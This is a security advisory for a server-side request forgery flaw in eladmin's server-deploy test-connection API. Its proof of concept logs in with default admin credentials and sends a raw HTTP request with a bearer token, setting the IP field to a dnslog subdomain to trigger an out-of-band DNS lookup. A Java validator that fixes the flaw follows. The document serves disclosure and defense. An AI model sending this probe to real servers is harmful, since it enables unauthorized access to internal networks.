# eladmin_ssrf

BUG_Author: shadia0

Affected version: eladmin v2.7 and before

Project Link: https://github.com/elunez/eladmin

URL: /api/serverDeploy/testConnect

Parameter: "ip"(POST)

Description:

eladmin v2.7 and earlier is vulnerable to Server-Side Request Forgery (SSRF) via ServerDeployController.java.

1. Log in to the back end with the project's default credentials admin/123456. From the left menu select '运维管理 (Operations Management)' > '服务器 (Server)' > '新增 (Add New Server)'; the server configuration dialog opens, where you can enter the server's IP. If you enter a domain name here, the front end rejects it, but the back-end interface does not perform this check.
2. Fill in a valid IP and click 测试连接 (Test Connection) to trigger the following request:
```http
POST /api/serverDeploy/testConnect HTTP/1.1
Host: localhost:8013
Content-Length: 104
sec-ch-ua: 
Accept: application/json, text/plain, */*
Content-Type: application/json
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiJiM2E5OWNkY2NiNzk0NzRjOGUzYTUyN2E1ZmUzY2NiYiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.NmbDtGywNsCE1dtK8ilWCwsEoPxO5F-aqj2jBIzyq45EDYfF9-PTqakUJz50fRo-D-sX8cBJpwQAUZpevgyijQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost:8013
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8013/mnt/mnt/serverDeploy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ELADMIN-TOEKN=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiJiM2E5OWNkY2NiNzk0NzRjOGUzYTUyN2E1ZmUzY2NiYiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.NmbDtGywNsCE1dtK8ilWCwsEoPxO5F-aqj2jBIzyq45EDYfF9-PTqakUJz50fRo-D-sX8cBJpwQAUZpevgyijQ
Connection: close

{"id":null,"name":"test_server","ip":"127.0.0.1","port":2222,"account":"root","password":"wrong"}
```
3. Generate a subdomain lg2phe.dnslog.cn on the dnslog platform, change the ip parameter to lg2phe.dnslog.cn and send the request. The DNS resolution record appears on the dnslog platform, confirming the SSRF vulnerability. (The other parameters such as account and password are not checked; a correct username and password are not required to trigger the vulnerability.)
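The server-side check that the advisory says is missing, written as an added example (this is not eladmin's own code, and the class name `DeployTargetValidator`, its methods, and the place it is called from in ServerDeployController.java are assumptions). The point is that the `ip` field must be validated before any connection attempt and without ever resolving a hostname: the DNS lookup alone is the out-of-band signal shown above, so the validator parses the value as an IPv4 literal and classifies it with `java.net.InetAddress.getByAddress`, which performs no lookup, unlike `getByName`.

```java
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Validates the "ip" field of the testConnect request on the server side.
 * Added example; the names here are assumptions, not eladmin's own API.
 */
public final class DeployTargetValidator {

    // Strict dotted-quad shape; the 0-255 range of each octet is checked below.
    private static final Pattern IPV4 =
            Pattern.compile("^(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})$");

    private DeployTargetValidator() {}

    /**
     * Parses an IPv4 literal without touching DNS. Returns null for anything
     * that is not a literal IPv4 address (hostnames, IPv6, empty input, bad octets).
     */
    public static InetAddress parseIpv4Literal(String value) {
        if (value == null) {
            return null;
        }
        Matcher m = IPV4.matcher(value.trim());
        if (!m.matches()) {
            return null;
        }
        byte[] octets = new byte[4];
        for (int i = 0; i < 4; i++) {
            int n = Integer.parseInt(m.group(i + 1));
            if (n > 255) {
                return null;
            }
            octets[i] = (byte) n;
        }
        try {
            // getByAddress() builds the address from raw bytes and never resolves a name.
            return InetAddress.getByAddress(octets);
        } catch (UnknownHostException e) {
            return null; // only thrown for a wrong-length array, which cannot happen here
        }
    }

    /**
     * True if the value is a literal IPv4 address that is not loopback, unspecified,
     * link-local (which covers cloud metadata endpoints), multicast or site-local.
     * If deploy hosts legitimately live in RFC 1918 ranges, replace the site-local
     * test with an explicit allowlist of the CIDR ranges they occupy.
     */
    public static boolean isAllowedDeployTarget(String value) {
        InetAddress a = parseIpv4Literal(value);
        if (a == null) {
            return false;
        }
        return !(a.isLoopbackAddress()
                || a.isAnyLocalAddress()
                || a.isLinkLocalAddress()
                || a.isMulticastAddress()
                || a.isSiteLocalAddress());
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the hostname is the one used in the advisory.
        String[] samples = {
            "203.0.113.10",      // documentation range literal: passes the check
            "127.0.0.1",         // loopback: rejected
            "169.254.169.254",   // link-local: rejected
            "10.0.0.5",          // RFC 1918: rejected by default, see comment above
            "lg2phe.dnslog.cn",  // hostname: rejected without any DNS query
            "999.1.1.1",         // malformed octet: rejected
        };
        for (String s : samples) {
            System.out.printf("%-20s -> %s%n", s,
                    isAllowedDeployTarget(s) ? "allowed" : "rejected");
        }
    }
}
```

In the controller this would run first, before any SSH client is created: if `isAllowedDeployTarget(dto.getIp())` is false (the DTO accessor name is an assumption), return HTTP 400 and do not open a connection. Because the front end already restricts the field to an IP literal, mirroring that rule on the server does not change the behaviour of legitimate requests; it only closes the path the advisory demonstrates, where a request sent directly to the API bypasses the client-side check.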